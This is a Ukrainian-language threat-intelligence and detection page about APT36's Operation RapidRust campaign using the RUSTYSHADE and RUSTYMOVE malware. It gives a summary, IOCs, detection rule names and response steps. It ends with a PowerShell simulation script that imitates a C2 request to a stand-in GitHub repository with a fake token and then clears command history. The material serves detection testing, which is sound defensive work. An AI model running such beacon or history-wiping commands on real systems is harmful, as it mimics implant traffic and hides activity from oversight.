APT36 запускає Операцію ШвидкаІржа з RUSTYSHADE та RUSTYMOVE
Detection stack
- AIDR
- Alert
- ETL
- Query
Резюме
Загроза APT36, пов’язана з Пакистаном, веде кампанію, відому як Operation RapidRust проти урядових і оборонних організацій. Група представила нове шкідливе програмне забезпечення на базі Rust, включаючи бекдор RUSTYSHADE та інструмент поширення RUSTYMOVE. APT36 також використовує спеціалізовані скрипти для крадіжки файлів, PSNATCH і BASHNATCH, щоб збирати та ексфільтрувати дані через приватні репозиторії GitHub.
Розслідування
Zscaler ThreatLabz ідентифікувала нові родини шкідливого ПЗ та інструменти після компрометації, які використовує APT36 у серпні 2026 року. Розслідування виявило, що RUSTYSHADE зловживає GitHub REST API для командного управління і використовує кібершахрайські домени для інсталяції навантаження. Дослідники також спостерігали спроби бічного переміщення та поширення RUSTYMOVE через знімні медіа для досягнення ізольованих середовищ.
Заходи захисту
Організаціям слід контролювати несанкціоноване використання GitHub API та незвичайні вихідні з’єднання з хмарними службами зберігання, такими як Backblaze. Слід встановити суворий контроль на знімні медіа, водночас підозрілі заплановані завдання, що імітують легітимні оновлення, повинні бути виявлені. Контроль кінцевих точок повинен також виявляти несанкціоноване виконання скриптів PowerShell чи Bash та незвичайну активність ексфільтрації файлів.
Відповідь
Якщо виявлено зловмисну активність, слід негайно ізолювати уражені кінцеві точки Windows і Linux, щоб запобігти боковому переміщенню та ексфільтрації даних. Відповідальні службовці повинні перевірити заплановані завдання та шукати файли, такі як DriverInstaller.zip or Automata-20.exe. Журнали мережі також слід переглянути для з’єднань з theprints[.]org, indiatodays[.]org, та підозрілу активність GitHub API, що походить з середовища.
Потік атак
Ми ще оновлюємо цю частину.
Виявлення
Можливість виконання прихованих рядків команд PowerShell (через cmdline)
Завантаження або вивантаження через Powershell (через cmdline)
Можливе виявлення віддаленої системи або перевірка підключення (через cmdline)
Можливе виявлення мережевих ресурсів (через cmdline)
Можлива енумерація адміністративного облікового запису або групи (через cmdline)
Можливе виявлення мережевої конфігурації системи (через cmdline)
Підозріле виконання з публічного профілю користувача (через process_creation)
Можливе створення запланованого завдання (через powershell)
Можливі спроби комунікації домену пошуку IP (через dns)
IOC (HashSha256) для виявлення: Operation RapidRust: APT36 розгортає RUSTYSHADE, RUSTYMOVE, PSNATCH і BASHNATCH
IOC (HashSha1) для виявлення: Operation RapidRust: APT36 розгортає RUSTYSHADE, RUSTYMOVE, PSNATCH і BASHNATCH
IOC (HashMd5) для виявлення: Operation RapidRust: APT36 розгортає RUSTYSHADE, RUSTYMOVE, PSNATCH і BASHNATCH
Комунікація C2 RUSTYSHADE через GitHub API [Підключення до мережі Windows]
Виявлення активності RUSTYSHADE та RUSTYMOVE через PowerShell [PowerShell для Windows]
Виконання симуляції
-
Опис атаки та команди: Противник успішно розгорнув імплант, схожий на RUSTYSHADE, на робочій станції Windows. Щоб отримати подальші інструкції, імплант повинен зв’язатися зі своїм центром командування та управління (C2), розміщеним на GitHub. Імплант спробує звернутися до певного репозиторію, щоб отримати навантаження. Щоб обійти базові фільтри периметру, які можуть блокувати анонімний доступ API, імплант використовує хардкодований Персональний Токен Доступу (PAT), переданий через
Authorization: token <TOKEN>заголовок. Ця дія спрямована на створення враження, що це інструмент розробника, який легітимно отримує метадані репозиторію, але специфічне поєднання URL-адреси репозиторію татокенпрефікс у заголовку спровокує правило виявлення. -
Сценарій регресійного тестування:
# Сценарій симуляції для імітації C2 комунікації RUSTYSHADE # Цей сценарій генерує запит, що збігається з логікою виявлення: # 1. URL містить 'api.github.com/repos/' # 2. Заголовок містить 'Authorization: token' $targetUrl = "https://api.github.com/repos/adversary-c2/malicious-repo/contents/config.json" $fakeToken = "ghp_sImUlAtEdToKeN1234567890AbCdEfGhIjKlMnOpQrStUvWxYz" # Конструювання заголовка, щоб відповідати точному рядку 'token', необхідному для правила $headers = @{ "Authorization" = "token $fakeToken" "User-Agent" = "RUSTYSHADE-Implant/1.0" } Write-Host "Спроба комунікації C2 з $targetUrl..." try { # Використовуємо -ErrorAction SilentlyContinue, так як URL підроблений і поверне 404, # але проксі все одно зафіксує спробу запиту. Invoke-WebRequest -Uri $targetUrl -Headers $headers -Method Get -ErrorAction SilentlyContinue Write-Host "Симуляційний запит успішно надіслано." } catch { Write-Host "Запит надіслано (Очікувана помилка через фейковий URL, але проксі-журнали повинні зафіксувати спробу)." } -
Команди очищення:
# Постійні зміни в систему не були внесені; # проте ми очищаємо історію команд для чистоти. Clear-History